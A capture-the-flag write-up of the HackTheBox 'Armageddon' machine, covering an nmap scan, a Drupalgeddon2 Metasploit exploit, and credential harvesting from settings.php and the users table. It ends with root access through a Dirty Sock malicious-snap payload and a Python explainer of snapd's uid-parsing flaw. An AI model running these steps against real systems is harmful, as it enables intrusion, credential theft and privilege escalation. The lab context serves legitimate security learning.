HackTheBox-Armageddon

sudo nmap --min-rate 100000 -A -sS   
  
Host is up (0.18s latency).  
Not shown: 998 closed tcp ports (reset)  
PORT   STATE SERVICE VERSION  
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)  
| ssh-hostkey:   
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)  
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)  
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)  
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)  
|_http-title: Welcome to  Armageddon |  Armageddon  
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16  
| http-robots.txt: 36 disallowed entries (15 shown)  
| /includes/ /misc/ /modules/ /profiles/ /scripts/   
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt   
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt   
|_/LICENSE.txt /MAINTAINERS.txt  
|_http-generator: Drupal 7 (http://drupal.org)  
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).  
TCP/IP fingerprint:  
OS:SCAN(V=7.94%E=4%D=4/15%OT=22%CT=1%CU=37686%PV=Y%DS=2%DC=T%G=Y%TM=661CA4C  
OS:3%P=x86_64-apple-darwin21.6.0)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=I%TS=A)SE  
OS:Q(SP=108%GCD=1%ISR=10B%TI=Z%II=I%TS=A)SEQ(SP=108%GCD=1%ISR=10B%TI=Z%CI=I  
OS:%II=I%TS=A)OPS(O1=M53AST11NW7%O2=M53AST11NW7%O3=M53ANNT11NW7%O4=M53AST11  
OS:NW7%O5=M53AST11NW7%O6=M53AST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=71  
OS:20%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=4  
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O  
OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40  
OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q  
OS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y  
OS:%DFI=N%T=40%CD=S)  
  
Network Distance: 2 hops  
  
TRACEROUTE (using port 1723/tcp)  
HOP RTT       ADDRESS  
1   132.89 ms 10.10.16.1  
2   214.85 ms 10.129.48.89  
  
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
Nmap done: 1 IP address (1 host up) scanned in 29.92 seconds  

Ports 22 and 80 are open.
Port 80 serves a web application, and robots.txt lists many files.
Among them, /CHANGELOG.txt reveals the version:
Drupal 7.56, 2017-06-21
Search for it in msf.
Use the exploit/unix/webapp/drupal_drupalgeddon2 module.
This yields a shell,
but with very low privileges;
no flag can be read.
The target also exposes port 22, so consider password reuse and connect over SSH.
/etc/passwd shows that the user brucetherealadmin exists; look for credentials in the configuration files and the database.
sites/default/settings.php contains the database username and password:

$databases = array (  
  'default' =>   
  array (  
    'default' =>   
    array (  
      'database' => 'drupal',  
      'username' => 'drupaluser',  
      'password' => 'CQHEy@9M*m23gBVj',  
      'host' => 'localhost',  
      'port' => '',  
      'driver' => 'mysql',  
      'prefix' => '',  
    ),  
  ),  
);  

The database holds what looks like the SSH password hash:

mysql -h localhost -u "drupaluser" -pCQHEy@9M*m23gBVj "drupal" -e "select uid,name,pass from users;"  
  
brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt  

Cracked the hash with cmd5 and logged in successfully.
Check the detailed privileges with sudo -l:
The snap command may be run as root.
Reference article:
https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html
Generate the payload:

python2 -c 'print"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"+ "A"*4256 + "=="' | base64 -d > exploit.snap  

Run sudo /usr/bin/snap install --devmode exploit.snap
Switch to the dirty_sock user; the password is also dirty_sock.
sudo cat /root/root.txt
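The Dirty Sock article linked above describes a parsing flaw in how snapd recovered the requesting user's uid from the unix-socket address string: the daemon wrote the real peer credentials first and appended the client's own (client-chosen) bind address, then scanned the whole string for `uid=` fields. The Python sketch below is an added illustration, not code from this writeup or from snapd; the address layout and the `;uid=0;` socket name follow the article, the function names and the hardened variant are my own.

```python
import re

# Constructed address string in the layout the daemon used: its own
# trusted fields first, then the client's socket name appended verbatim.
TRUSTED_PREFIX = "pid=5127;uid=1000;socket=/run/snapd.socket;"
HONEST_PEER = TRUSTED_PREFIX + "@"            # unnamed client socket
CRAFTED_PEER = TRUSTED_PREFIX + "/tmp/sock;uid=0;"  # client-chosen name


def parse_uid_trusting(remote_addr: str) -> int:
    """Vulnerable behaviour: every ';'-separated token is scanned and the
    last 'uid=' wins, including ones inside the untrusted socket name."""
    uid = -1
    for token in remote_addr.split(";"):
        if token.startswith("uid="):
            uid = int(token[4:])
    return uid


def parse_uid_hardened(remote_addr: str) -> int:
    """Only the fixed prefix written by the daemon is credential data:
    stop at the first 'socket=' field and require exactly one numeric
    'uid=' before it. Anything after 'socket=' is peer-controlled."""
    head, sep, _peer_name = remote_addr.partition(";socket=")
    if not sep:
        raise ValueError("malformed address: no socket= field")
    uids = [t[4:] for t in head.split(";") if t.startswith("uid=")]
    if len(uids) != 1 or not re.fullmatch(r"[0-9]+", uids[0]):
        raise ValueError("malformed address: expected one uid= field")
    return int(uids[0])
```

Taking the peer uid directly from SO_PEERCRED instead of a re-parsed string removes the problem entirely, which is why sudo access to snap on an unpatched snapd is a root-equivalent grant.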
